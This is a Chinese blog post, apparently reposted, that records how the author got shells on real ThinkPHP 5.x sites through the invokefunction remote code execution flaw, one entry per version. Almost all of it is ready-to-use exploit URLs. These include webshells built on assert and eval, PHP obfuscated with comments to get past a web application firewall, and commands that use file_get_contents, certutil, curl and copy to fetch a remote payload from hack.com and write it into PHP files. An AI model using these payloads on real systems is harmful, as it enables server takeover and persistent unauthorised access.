zoukankan      html  css  js  c++  java
  • ThinkPHP5.x.x各版本实战环境getshell

    1. #这个文章我之前在t00ls已经分享过了

    2. #内容只是对tp5的实战环境下getshell做的记录,中间遇到的一些小问题的突破,没啥技术含量

    -5.1.18

    1. http://www.xxxxx.com/?s=admin/ hinkapp/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][0]=index11.php&vars[1][1]=<?=file_put_contents('index_bak2.php',file_get_contents('https://www.hack.com/xxx.js'));?>

    -5.0.5

    1. wafeval进行了拦截

    2. 禁止了assert函数

    3. eval函数后面的括号进行了正则过滤

    4. file_get_contents函数后面的括号进行了正则过滤

    5. http://www.xxxx.com/?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=2.php&vars[1][1]=<?php /*1111*//***/file_put_contents/*1**/(/***/'index11.php'/**/,file_get_contents(/**/'https://www.hack.com/xxx.js'))/**/;/**/?>

    -5.1.18

    1. 所有目录都无写权限,base64函数被拦截

    2. http://www.xxxx.com/?s=admin/ hinkapp/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][0]=eval($_POST[1])

    -5.0.18

    1. windows

    2. http://www.xxxx.com/?s=admin/ hinkapp/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][0]=1

    3. http://www.xxxx.com/?s=admin/ hinkapp/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][0]=phpinfo()

    4. 使用certutil

    5. http://www.xxxx.com/?s=admin/ hinkapp/invokefunction&function=call_user_func_array&vars[0]=passthru&vars[1][0]=cmd /c certutil -urlcache -split -f https://www.hack.com/xxx.js uploads/1.php

    6. 由于根目录没写权限,所以写到uploads

    -5.0.14

    1. eval'')和assert'')被拦截,命令函数被禁止

    2. http://www.xxxx.com/?s=admin/ hinkapp/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][0]=phpinfo();

    3. http://www.xxx.com/?s=admin/ hinkapp/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][0]=eval($_GET[1])&1=call_user_func_array("file_put_contents",array("3.php",file_get_contents("https://www.hack.com/xxx.js")));

    -5.0.11

    1. http://www.xxxx.cn/?s=admin/ hinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][0]=curl https://www.hack.com/xxx.js -o ./upload/xxx.php

    -5.0.14

    1. php7.2

    2. http://www.xxxx.cn/?s=admin/ hinkapp/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][0]=1.txt&vars[1][1]=1

    3. http://www.xxxx.cn/?s=admin/ hinkapp/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][0]=index11.php&vars[1][1]=<?=file_put_contents('index111.php',file_get_contents('https://www.hack.com/xxx.js'));?>

    4. 写进去发现转义了尖括号

    5. 通过copy函数

    6. http://www.xxxx.cn/?s=admin/ hinkapp/invokefunction&function=call_user_func_array&vars[0]=copy&vars[1][0]= https://www.hack.com/xxx.js&vars[1][1]=112233.php

  • 相关阅读:
    [原创]SQL 把表中某一个列按照逗号拼接成一行
    [原创]SQL 把表中字段存储的逗号隔开内容转换成列表形式
    JQuery DataTables相关
    Jquery相关
    json字串主从表无法转成对像
    FastReport.net 使用 WebForm 实现打印 最简单版
    c# .netframwork 4.0 调用 2.0时报错 混合模式程序集是针对“v2.0.50727”版的运行时生成的,在没有配置其他信息的情况下,无法在 4.0 运行时中加载该程序集。
    FastReport.net 使用 Winform WebForm打印
    asp.net dev xtraReporting(一)静态页面
    C# DataTable转json 时间格式化
  • 原文地址:https://www.cnblogs.com/hookjoy/p/11785585.html
Copyright © 2011-2022 走看看